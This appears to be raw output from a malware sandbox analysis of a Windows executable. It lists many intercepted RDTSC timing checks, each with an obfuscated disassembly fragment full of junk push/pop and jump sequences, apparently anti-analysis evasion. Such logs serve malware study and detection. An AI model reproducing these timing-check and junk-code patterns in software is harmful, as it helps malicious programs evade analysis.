                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D469F second address: 13D46A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D46A3 second address: 13D472E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F8F34B47B66h 0x0000000c jmp 00007F8F34B47B60h 0x00000011 popad 0x00000012 pop eax 0x00000013 jp 00007F8F34B47B59h 0x00000019 push 00000003h 0x0000001b jmp 00007F8F34B47B5Ch 0x00000020 push 00000000h 0x00000022 mov si, 3E2Ch 0x00000026 push 00000003h 0x00000028 mov dword ptr [ebp+122D354Eh], edx 0x0000002e call 00007F8F34B47B59h 0x00000033 pushad 0x00000034 pushad 0x00000035 jmp 00007F8F34B47B64h 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d jl 00007F8F34B47B58h 0x00000043 push edx 0x00000044 pop edx 0x00000045 popad 0x00000046 push eax 0x00000047 push ebx 0x00000048 jp 00007F8F34B47B5Ch 0x0000004e pop ebx 0x0000004f mov eax, dword ptr [esp+04h] 0x00000053 push eax 0x00000054 push edx 0x00000055 jl 00007F8F34B47B58h 0x0000005b push esi 0x0000005c pop esi 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D472E second address: 13D4740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8F347F9F1Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4740 second address: 13D4774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F8F34B47B64h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F8F34B47B5Dh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4774 second address: 13D4779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4779 second address: 13D47B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8F34B47B5Bh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c jg 00007F8F34B47B5Ch 0x00000012 lea ebx, dword ptr [ebp+124564F6h] 0x00000018 sbb ecx, 782488C4h 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F8F34B47B60h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D47B6 second address: 13D47BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D47BC second address: 13D47C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4825 second address: 13D484D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F8F347F9F25h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D484D second address: 13D48A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F8F34B47B58h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jmp 00007F8F34B47B5Ch 0x00000028 jng 00007F8F34B47B5Bh 0x0000002e sbb cx, 48FFh 0x00000033 push 00000000h 0x00000035 mov edx, 3083246Ch 0x0000003a call 00007F8F34B47B59h 0x0000003f push eax 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D48A0 second address: 13D48E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F347F9F1Ah 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c jc 00007F8F347F9F20h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007F8F347F9F26h 0x0000001b mov eax, dword ptr [eax] 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D48E2 second address: 13D48E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D48E6 second address: 13D4913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F8F347F9F1Ch 0x0000000c jo 00007F8F347F9F16h 0x00000012 popad 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 jnp 00007F8F347F9F18h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F8F347F9F1Bh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4913 second address: 13D4917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4917 second address: 13D49D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov dword ptr [ebp+122D1B95h], edi 0x0000000e push 00000003h 0x00000010 call 00007F8F347F9F23h 0x00000015 or edx, dword ptr [ebp+122D36E3h] 0x0000001b pop edi 0x0000001c push 00000000h 0x0000001e push 00000003h 0x00000020 push esi 0x00000021 mov ecx, dword ptr [ebp+122D359Fh] 0x00000027 pop esi 0x00000028 push 929D8EE1h 0x0000002d jmp 00007F8F347F9F28h 0x00000032 xor dword ptr [esp], 529D8EE1h 0x00000039 jmp 00007F8F347F9F28h 0x0000003e lea ebx, dword ptr [ebp+124564FFh] 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007F8F347F9F18h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 00000018h 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e mov dword ptr [ebp+122D25C3h], edi 0x00000064 xchg eax, ebx 0x00000065 jmp 00007F8F347F9F27h 0x0000006a push eax 0x0000006b jbe 00007F8F347F9F2Eh 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4B0F second address: 13D4B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 add dword ptr [esp], 1BD92144h 0x0000000d jmp 00007F8F34B47B5Fh 0x00000012 lea ebx, dword ptr [ebp+1245650Ah] 0x00000018 mov di, dx 0x0000001b mov ecx, dword ptr [ebp+122D3673h] 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F8F34B47B5Eh 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6631 second address: 13E6637 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6637 second address: 13E663D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F49C5 second address: 13F49C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F49C9 second address: 13F49CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F49CD second address: 13F49F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007F8F347F9F16h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8F347F9F1Fh 0x00000017 js 00007F8F347F9F16h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F27C4 second address: 13F27D9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8F34B47B5Ch 0x00000008 jng 00007F8F34B47B56h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F2C84 second address: 13F2C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8F347F9F16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F2C90 second address: 13F2C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F8F34B47B56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F2C9E second address: 13F2CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F347F9F1Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F2CB2 second address: 13F2CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F8F34B47B6Bh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F2CDA second address: 13F2CF0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8F347F9F16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jne 00007F8F347F9F16h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3401 second address: 13F341F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8F34B47B56h 0x00000008 jmp 00007F8F34B47B60h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F341F second address: 13F342E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F347F9F1Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F342E second address: 13F343E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8F34B47B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3997 second address: 13F39B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F1Eh 0x00000007 jmp 00007F8F347F9F1Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F39B8 second address: 13F39C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8F34B47B56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F39C2 second address: 13F39C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F39C6 second address: 13F39CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F39CC second address: 13F39E9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F8F347F9F16h 0x00000009 pop edi 0x0000000a jo 00007F8F347F9F18h 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jl 00007F8F347F9F1Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7F24 second address: 13E7F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7F28 second address: 13E7F2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CA958 second address: 13CA976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8F34B47B56h 0x0000000a jmp 00007F8F34B47B64h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3B9C second address: 13F3BAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8F347F9F16h 0x0000000a jbe 00007F8F347F9F16h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F408F second address: 13F40B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F34B47B68h 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jbe 00007F8F34B47B56h 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F40B7 second address: 13F40BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F40BE second address: 13F40E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8F34B47B69h 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F43BF second address: 13F43C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4540 second address: 13F4562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F34B47B67h 0x00000009 pop ecx 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4562 second address: 13F4566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4824 second address: 13F482E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F482E second address: 13F4853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F8F347F9F27h 0x0000000b jnl 00007F8F347F9F16h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F82BA second address: 13F82D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8F34B47B5Ah 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F82D3 second address: 13F82DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F85ED second address: 13F85F7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8F34B47B5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C593E second address: 13C594E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F347F9F1Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FF822 second address: 13FF87C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F8F34B47B64h 0x0000000c jmp 00007F8F34B47B5Ch 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 jne 00007F8F34B47B56h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c jmp 00007F8F34B47B60h 0x00000021 jmp 00007F8F34B47B65h 0x00000026 popad 0x00000027 popad 0x00000028 push edx 0x00000029 pushad 0x0000002a jng 00007F8F34B47B56h 0x00000030 push edi 0x00000031 pop edi 0x00000032 pushad 0x00000033 popad 0x00000034 popad 0x00000035 push ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FFB8B second address: 13FFB91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FFB91 second address: 13FFB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FFEEC second address: 13FFEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1402791 second address: 140279B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8F34B47B5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403503 second address: 1403507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403507 second address: 1403517 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14035B9 second address: 14035D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F8F347F9F16h 0x00000009 jbe 00007F8F347F9F16h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14035D2 second address: 14035D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14035D8 second address: 1403620 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F8F347F9F18h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 jmp 00007F8F347F9F21h 0x0000002a nop 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 jnc 00007F8F347F9F16h 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403620 second address: 1403626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403626 second address: 140363A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14038A0 second address: 14038A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403A66 second address: 1403A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403A75 second address: 1403A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403B14 second address: 1403B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403B18 second address: 1403B28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140418F second address: 1404193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140541B second address: 140542E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140542E second address: 1405432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14067A4 second address: 14067A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14067A8 second address: 14067AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14072B3 second address: 14072D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007F8F34B47B64h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14072D8 second address: 14072DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1408809 second address: 140880F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140880F second address: 1408814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407B6E second address: 1407B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8F34B47B5Ah 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14085A4 second address: 14085AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C0E8 second address: 140C0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C0EE second address: 140C111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnl 00007F8F347F9F27h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
